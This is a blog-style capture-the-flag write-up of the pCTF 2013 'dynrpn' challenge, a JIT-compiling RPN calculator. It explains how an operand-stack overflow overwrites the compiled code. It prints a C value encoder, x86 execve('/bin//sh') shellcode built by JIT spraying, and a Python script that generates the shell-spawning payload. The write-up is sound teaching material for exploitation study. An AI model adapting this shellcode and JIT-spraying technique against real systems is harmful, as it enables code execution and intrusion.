26
Apr
2013

pCTF 2013 – dynrpn (pwnable 250)

`dc` runs too slowly for my tastes.

Dynrpn is a calculator program which uses Reverse Polish Notation as syntax which is somewhat compatible with the syntax used by the dc calculator program. However, this version compiles every expression to native FPU code and then runs that code to get the answer.

RPN works like a stack machine: you specify a string of numbers and operators, and the string is evaluated left to right. Every number pushes that value onto the operand stack, and every operation takes the top two operands from the stack and pushes the result back onto the stack. There are also some commands to directly manipulate the stack, such as the “d” command which duplicates the top value on the stack.

The bug is that if you push too many values onto the operand stack, the stack (which grows downward) will reach into the area into which the instructions were compiled. This means the instructions will be overwritten with the floating-point numbers that have been pushed onto the stack, which can lead to code execution.

The major problem of this challenge is to get some floating point numbers onto the stack that, when executed as x86 code, will spawn a shell. In order to get this to work it helps to have a very basic understanding of the way double precision floating point numbers are stored in memory. Wikipedia has a surprisingly good article about this.

There is a complication in that we can only specify “long” integers as input. The program will convert these to double precision floating point before pushing them onto the stack. Because of this we gave up on controlling the sign and exponent bits (the top 12 bits) and focused on finding a way to push a value onto the stack of which we control the bottom 48 bits (or 6 bytes). Of those 6 bytes, the last 2 will be short jump instruction to the next controlled 6 byte chunk, leaving us 4 byte chunks to work with to implement a shellcode with. This is only slightly restrictive, in fact this technique (also known as “jit spraying”) has been shown to work with even 2 bytes for arbitrary instructions.

Here is our program for encoding arbitrary 48-bit values. It basically takes the desired value, sets the top 12 bits so it somewhat resembles a double-precision floating point number, and then iterates over various values of the exponent. For each value it checks whether the value will survive a conversion to unsigned long intact, and then takes the square root of this number so it can be encoded as an integer value. The square root introduces an error which is compensated by adding another value to it. This is all very crude, but it works, and we were trying to solve this as quickly as possible.

The code (in C, and not cleaned up after the CTF, so apologies for inefficiencies and uglyness):

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <math.h>

int main(int argc, char** argv) {

	union {
		double dval;
		volatile unsigned long lval;
	} foo;

    unsigned long target;

    if (argc < 2 || !(target = strtoul(argv[1], NULL, 16)) || target >= (1ul << 48)) {
        printf("error\n");
        return 1;
    }

    foo.lval = target | (1023ul << 52);
    
    int i,j;

    for (i = 0; i < 256; i++) {
        volatile double x = (unsigned long) foo.dval;
        if (target == (*((unsigned long*) &x) & 0xffffffffffff)) {
            //printf("%ld ", (long) foo.dval);
            double s = sqrt(x);
            unsigned long tmp = s;
            unsigned long tmp2 = ((unsigned long) x) - (tmp * tmp);
            printf ("%lu %lu * %lu + \n", tmp, tmp, tmp2);
        }
        //printf("%d %016lx %lu\n", i, *((unsigned long*) &x), (unsigned long) foo.dval);
        foo.lval += 1ul << 52;
    }

    return 0;
}

And the shellcode which we wrote (by iteratively assembling and hexdumping to check and fix the alignment):

use32
xor eax,eax
cdq
push eax
jmp $+4
nop 
nop
mov cx,0x6873
jmp $+4
nop 
nop
shl ecx,16
nop
jmp $+4
nop 
nop
mov cx,0x2f6e
jmp $+4
nop 
nop
push ecx
nop
nop
nop
jmp $+4
nop 
nop
mov cx,0x6962
jmp $+4
nop 
nop
nop
shl ecx,16
jmp $+4
nop 
nop
mov cx,0x2f2f
jmp $+4
nop 
nop
push ecx
nop
mov ebx,esp
jmp $+4
nop 
nop
xor ecx,ecx
mov al,0xb
jmp $+4
nop 
nop
push edx
push ecx
push ebx
nop
jmp $+4
nop 
nop
mov ecx,esp
int 0x80
jmp $+4
nop 
nop

The nop’s are the 2-byte parts that will be replaced with byte values that we do not control. In addition to the calculations needed to push this code onto the stack we created a sequence that does nothing (only nops and jumps) so that we could play with the alignment. This is because we found that while it was easy to make our stack data overwrite the code, it was a bit tricky to hit exactly the right spot so that control transfers cleanly to our code, without partially corrupting an instructions that will cause a crash instead.

Our final exploit:


# shellcode, will be reversed before printing because stack grows down

l = [
"67132773 67132773 * 109524568 + ",
"47470041 47470041 * 67635906 + ",
"67132781 67132781 * 100172120 + ",
"47470036 47470036 * 64021795 + ",
"67132781 67132781 * 108539880 + ",
"47470041 47470041 * 75467458 + ",
"16783191 16783191 * 15555720 + ",
"47470036 47470036 * 61957411 + ",
"67132792 67132792 * 23668753 + ",
"67132765 67132765 * 27530600 + ",
"47470045 47470045 * 22357984 + ",
"67132779 67132779 * 112654032 + ",
]

print ''.join(l[::-1]),

# nop sequence below the shellcode

print "16783195 16783195 * 15175344 + ",

# repeat the nop sequence a whole bunch of times

print "d " * 1000

This will output the instructions to send to the server. After executing these instructions the server will have spawned a shell, and you can just enter shell commands to get the flag file.

Comments are closed.